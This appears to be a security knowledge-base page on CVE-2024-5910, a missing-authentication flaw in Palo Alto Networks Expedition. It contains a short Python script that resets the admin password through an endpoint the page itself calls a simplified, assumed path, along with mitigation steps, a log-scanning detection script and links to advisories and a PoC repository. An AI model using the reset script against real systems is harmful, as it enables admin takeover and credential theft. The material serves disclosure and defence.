# Exploiting Missing Authentication in Palo Alto Networks Expedition

**CVE-2024-5910** is a critical vulnerability in the Palo Alto Networks Expedition tool, which is used for firewall configuration migration and management. This vulnerability arises from missing authentication for a critical function, allowing an attacker with network access to take over an Expedition admin account. Once exploited, attackers can gain access to sensitive configuration secrets, credentials, and other data stored within the tool.

**Exploit Details**

The vulnerability can be exploited by sending a specially crafted request to an exposed endpoint, which resets the admin password. Here’s a simplified example of how the exploit might work:

1. **Identify the Vulnerable Endpoint**: The attacker identifies an exposed endpoint in the Expedition tool that lacks proper authentication.
2. **Craft the Exploit Request**: The attacker crafts a request to reset the admin password. This can be done using a simple HTTP request.

```python
import requests

# URL of the vulnerable endpoint
url = "http://<target-expedition-server>/reset_admin_password"

# Crafting the exploit payload
payload = {
    "new_password": "NewSecurePassword123!"
}

# Sending the exploit request
response = requests.post(url, data=payload)

# Checking the response
if response.status_code == 200:
    print("Admin password reset successfully!")
else:
    print("Failed to reset admin password.")
```

3. **Execute the Exploit**: The attacker sends the crafted request to the vulnerable endpoint. If successful, the admin password is reset to a new value controlled by the attacker.
4. **Gain Access**: With the new admin password, the attacker can log in to the Expedition tool and access sensitive data, including configuration secrets and credentials.

**Mitigation**

To mitigate this vulnerability, it is essential to:

1. **Update Expedition**: Upgrade to Expedition version 1.2.92 or later, where the vulnerability has been fixed.
2. **Restrict Network Access**: Ensure that network access to the Expedition installation is restricted to authorized users, hosts, or networks.
3. **Monitor for Indicators of Compromise**: Regularly check for any signs of exploitation and take immediate action if any are found.
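One way to act on the network-restriction and monitoring steps above is to review web server access logs for password-reset requests, ranking them by whether they came from outside the management network and whether they succeeded. This is an added example, not code from the original page or from Palo Alto Networks. It assumes a common/combined-format access log, uses the path from this page's simplified example as a stand-in for the real endpoint, and uses a constructed allowlist and constructed log lines.

```python
import ipaddress
import re

# Assumption: path from this page's simplified example, not a confirmed
# Expedition endpoint; substitute the path named in the vendor advisory.
RESET_PATH = "/reset_admin_password"
# Assumption: management networks allowed to reach Expedition (constructed).
ALLOWED_NETS = [ipaddress.ip_network("10.20.0.0/24")]

# Common/combined access-log prefix: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

def is_allowed(ip_text):
    """True if the client address falls inside an allowed management network."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False  # unparsable client field: treat as untrusted
    return any(ip in net for net in ALLOWED_NETS)

def find_suspect_resets(lines):
    """Return one finding per POST to RESET_PATH, ranked by source and status."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["target"].split("?", 1)[0].rstrip("/").lower()
        if path != RESET_PATH:
            continue
        outside = not is_allowed(m["ip"])
        succeeded = m["status"].startswith("2")
        severity = "high" if outside and succeeded else "medium" if outside or succeeded else "low"
        findings.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]), "severity": severity})
    return findings

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.20.0.15 - - [12/Jul/2024:09:14:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.77 - - [12/Jul/2024:09:15:40 +0000] "POST /reset_admin_password HTTP/1.1" 200 48 "-" "python-requests/2.31.0"',
    '10.20.0.15 - - [12/Jul/2024:09:20:11 +0000] "POST /reset_admin_password/ HTTP/1.1" 403 210 "-" "curl/8.4.0"',
    '198.51.100.9 - - [12/Jul/2024:09:21:30 +0000] "POST /login.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(*find_suspect_resets(SAMPLE_LOG), sep="\n")
```

A `high` finding (outside source, 2xx status) warrants treating the admin account and any stored secrets as compromised; `medium` and `low` findings still show that the endpoint is being reached and should be checked against change records.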

For more detailed guidance and updates, you can refer to the [CISA advisory](https://cyble.com/blog/cisa-finds-palo-alto-networks-cve-2024-5910-exploited-in-the-wild/) and other security advisories.

You can find the proof-of-concept (PoC) exploit for CVE-2024-5910 on GitHub. Here is the link to the repository:

[CVE-2024-5910 PoC on GitHub](https://github.com/horizon3ai/CVE-2024-5910)

{% hint style="warning" %}
**Warning:** All information on this page is provided solely for understanding the CVE-2024-5910 vulnerability and applying the patch as soon as possible. Unauthorized use of this information for any other purpose is strictly prohibited. Failure to apply the patch immediately may result in severe security risks, including unauthorized access and data theft.
{% endhint %}

For applying the patch for CVE-2024-5910, you can refer to the following link:

<https://security.paloaltonetworks.com/CVE-2024-5910>

